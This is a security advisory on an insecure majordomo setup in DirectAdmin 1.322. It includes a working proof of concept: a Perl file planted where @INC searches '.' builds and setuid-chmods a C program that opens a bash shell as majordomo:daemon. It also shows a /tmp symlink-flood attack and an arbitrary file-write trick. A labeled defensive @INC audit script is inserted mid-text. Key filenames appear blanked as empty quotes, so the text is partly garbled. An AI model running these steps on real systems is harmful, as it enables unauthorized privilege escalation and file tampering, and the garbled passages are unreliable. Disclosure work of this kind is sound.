DirectAdmin 1.322 - insecure majordomo setup allows for privilege escalation

Note: this issue was already covered in the majordomo documentation. The issue here is that DirectAdmin used an insecure default setup of this third-party software.


Due to an insecure default setup of the majordomo software, local users could escalate privileges to user:group majordomo:daemon.

UPDATE: 06/02/2010 - playing with this again for a few minutes reveals this was in fact trivially rootable through DirectAdmin, and in multiple ways.


Local users could escalate privileges to majordomo:daemon. This happens when running "/etc/virtual/majordomo/wrapper config-test", because the wrapper looks for a file called "" in the paths listed in @INC. The file is not found in any of those paths, and the very last path searched in @INC is "." (the current directory), so a local user can create a file called "" in the directory from which they run "/etc/virtual/majordomo/wrapper config-test", and the wrapper will attempt to execute that file. Since the wrapper runs as user:group majordomo:daemon, we must first give world-writable permissions to our own home directory (or you can probably just use /tmp).

Here is example output of running the command mentioned above:

[user@host ~]$ /etc/virtual/majordomo/wrapper config-test
---------------- Config-test for Majordomo ----------------

[ ... ]

Good: 'require'd /etc/virtual/majordomo/ okay.
Good: found okay.
Can't locate in @INC (@INC contains: [ ... ]
.) at /etc/virtual/majordomo/config-test line 129

Note the "." at the very end of the "@INC contains" section.

[user@host ~]$ cat > << EOF

open my $shell_fh, '>', 'foo.c' or die $!;
print $shell_fh 'int main() { setreuid(102,102); setregid(2,2); system("/bin/bash"); }' . "\n";
close $shell_fh;

system("gcc foo.c -o foo");
system("chmod 6755 foo");
[user@host ~]$ chmod 755 ~/
[user@host ~]$ chmod 777 ~
[user@host ~]$ /etc/virtual/majordomo/wrapper config-test
[user@host ~]$ ./foo
[majordmomo@host ~]$ id
uid=102(majordomo) gid=2(daemon) groups=503(user)
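
To check a host for the search-path condition described above, the following added example (not part of the original advisory or of DirectAdmin/majordomo) audits an @INC listing for relative or world-writable entries. The function name audit_inc_paths and the sample absolute paths are assumptions made for illustration.

```shell
#!/usr/bin/env bash
# Added example (not from the original advisory): audit a Perl @INC listing,
# one path per line on stdin, for entries a local user could plant a file in.
# Prints "RISK <reason> <path>" per finding; returns 1 if anything was flagged.
audit_inc_paths() {
    local path risky=0
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        case "$path" in
            /*) ;;  # absolute entry: permissions are checked below
            *)  # "." and other relative entries resolve against the current
                # directory, which is chosen by whoever invokes the wrapper.
                printf 'RISK relative %s\n' "$path"
                risky=1
                continue ;;
        esac
        # Directories that do not exist are ignored here.
        [ -d "$path" ] || continue
        # -L: judge the directory a symlinked entry points to, not the link.
        if [ -n "$(find -L "$path" -maxdepth 0 -perm -0002 2>/dev/null)" ]; then
            printf 'RISK world-writable %s\n' "$path"
            risky=1
        fi
    done
    return "$risky"
}

# Constructed sample: the advisory's own listing is elided apart from the
# trailing ".", so the absolute paths below are placeholders.
audit_inc_paths <<'EOF' || true
/usr/lib/perl5/site_perl
/usr/lib/perl5/vendor_perl
.
EOF
```

On a live host, feed it the output of `perl -e 'print "$_\n" for @INC'`. Perl 5.26 and later no longer include "." in the default @INC, so this finding is mostly seen on older installations or where the path is added explicitly.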

Two other issues were also reported, but they won't be fully discussed here, since the fix was simply a proper setup of the software. Examples can be found below.

[user@host ~]$ grep -n /tmp/log
327:$log_file = "/tmp/log.$$";

[user@host ~]$ cd /tmp
[user@host /tmp]$ for x in `seq 1000 30000` ; do ln -s /etc/virtual/majordomo/foo log.$x ; done
[user@host /tmp]$ /etc/virtual/majordomo/wrapper digest
mj_digest: ABORT
[user@host /tmp]$ ls /etc/virtual/majordomo/foo

[user@host ~]$ chmod 777 ~
[user@host ~]$ /etc/virtual/majordomo/wrapper -f /home/user/test -a foo
[user@host ~]$ ls -l test
-rw-rw-r--  1 majordomo daemon    1 Sep  7 01:28 test